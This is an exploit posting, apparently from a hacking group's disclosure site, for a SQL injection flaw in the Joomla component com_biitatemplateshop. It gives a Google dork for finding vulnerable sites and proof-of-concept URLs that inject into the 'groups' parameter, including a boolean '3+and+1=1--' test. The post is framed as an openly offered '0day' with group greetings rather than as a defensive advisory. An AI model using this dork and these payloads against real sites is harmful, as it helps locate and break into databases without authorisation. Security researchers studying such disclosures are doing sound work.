The Joomla Biitatemplateshop component suffers from a remote SQL injection vulnerability.
52bb9485d37a1a44d3eb97b2c195061f55ea3d332b38ebc3eb88c7124742b21d
__________.__ __ ___ ___
\______ \ | _____ ____ | | __ / | \ ____
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /
\/ \/ \/ \/ \//_____/
.ORG
[+] Info=================================================================
[-] Title : Joomla Component (com_biitatemplateshop) SQL Injection
Vulnerability
[-] Author: BHG Security Group
[-] Home : Black-HG.Org
[-] Vendor: http://joomla.com
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/09/2011
[-] Google Dork : inurl:com_biitatemplateshop
[-] Category : webapps / 0day
[-] Tested On: Apache/2.2.3 (CentOS)
[-] Special Thanks : A.Cr0x ~ Mr.Xhat ~ cyrus ~ 3H34N ~ 4m!n
[+] Exploit===============================================================
[-] P0c :)
# http://[localhost]/index.php?option=com_biitatemplateshop&groups=1
[-] Exploit Testing !
# http://[localhost]/index.php?option=com_biitatemplateshop&groups=[SQLI]
# http://[localhost]/index.php?option=com_biitatemplateshop&groups=3+and+1=1--
^_^ G00d LUCK ALL :=)
[+] Greets===================================================================+
+
Net.Edit0r , tHe.k!ll3r, ArYaIeIrAn b3hz4d, Hurr!c4nE , Cru3l.b0y , Mikili, +
+
r3v0lter,Skitt3r ,cmaxx + NoL1m1t, <3 I Love You iRAN Far==>D <3 +
+
=============================================================================+